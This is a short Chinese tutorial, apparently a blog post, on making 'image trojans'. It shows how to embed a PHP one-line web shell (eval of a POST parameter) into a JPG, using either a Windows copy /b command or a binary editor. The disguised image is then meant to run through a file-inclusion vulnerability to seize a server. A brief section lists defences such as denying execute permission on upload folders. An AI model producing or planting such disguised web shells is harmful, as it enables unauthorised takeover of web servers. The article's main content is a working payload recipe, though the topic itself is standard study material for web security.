图片木马

顾名思义，看上去很像图片的木马。

木马必然是个可执行的程序文件，其后缀名是“exe”。

原理

以文件上传漏洞为基本条件，将可执行的条件写入图片中去，再利用文件包含漏洞来执行图片中存在的一句话木马，从而获取目标服务器的权限。

条件

• 图片能够正常显示
• 包含可执行的恶意代码

漏洞防范

• 尽量使用最新的web服务器版本

• 图片最好是存入oss,或者图片上传目录注意不要给执行权限(web服务器执行图片目录的权限)

• 可以的话,对图片进行二次处理,把木马文件过滤掉

• 永远不要相信用户的输入

制作方法

• copy法（这种方法需要用到命令行窗口）

首先，准备好jpg文件和php文件

php文件内容：<?php eval($_POST['hack'])?>

使用下面的命令来生成图片木马

copy hack.jpg/b+hack.php/a hehehe.jpg

其中，a表示ASCII码文件，b表示二进制文件

图片木马制作完成

对比原图片代码和木马图片代码

可知，恶意代码已嵌入原图

• 二进制编辑器法（使用二进制编辑器工具）

这里我使用到的是Editor

打开编辑器后，打开文件

在任意位置插入木马语句**<?php eval($_POST['hack'])?>**

保存图片，对比查看原图和木马图片

• 其他方法：利用Photoshop插入木马语句，渲染绕过等……

小生不才，以后慢慢再学